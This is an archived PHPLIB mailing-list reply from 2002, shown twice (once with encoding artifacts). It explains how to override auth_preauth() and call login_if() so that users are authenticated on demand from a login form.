Subject: Re: [Phplib-users] Re: Default Auth? 7.2d
Hi,
* Darryl Morgan wrote:
> login page to say I want to auth the user now and change the page_open(=
)
on
> each page to include authorisation. Not sure what other way you could =
go
> about this. Does anybody else have any suggestions?
Consider overwriting auth_preauth() in your own auth class:
function auth_preauth() {
return $this->auth_validatelogin();
}
and do an
$auth->login_if($again);
after your page_open() call. $again has to be set from your
login form (i.e. hidden field with value=3D"yes").
--
PHP-Support * realit=E4tsnahe Performance-Messungen mit Code-Analyse
Webapplikationsentwicklung * PHP-Schulungen * Consulting
0700-THINKPHP -*- bj...@th...
_______________________________________________
Phplib-users mailing list
Php...@li...
https://lists.sourceforge.net/lists/listinfo/phplib-users
|
|
From: S. <bj...@ba...> - 2002-02-26 14:07:41
|
Hi,
* Darryl Morgan wrote:
> login page to say I want to auth the user now and change the page_open() on
> each page to include authorisation. Not sure what other way you could go
> about this. Does anybody else have any suggestions?
Consider overwriting auth_preauth() in your own auth class:
function auth_preauth() {
return $this->auth_validatelogin();
}
and do an
$auth->login_if($again);
after your page_open() call. $again has to be set from your
login form (i.e. hidden field with value="yes").
--
PHP-Support * realitätsnahe Performance-Messungen mit Code-Analyse
Webapplikationsentwicklung * PHP-Schulungen * Consulting
0700-THINKPHP -*- bj...@th...
|
17 messages has been excluded from this view by a project administrator.
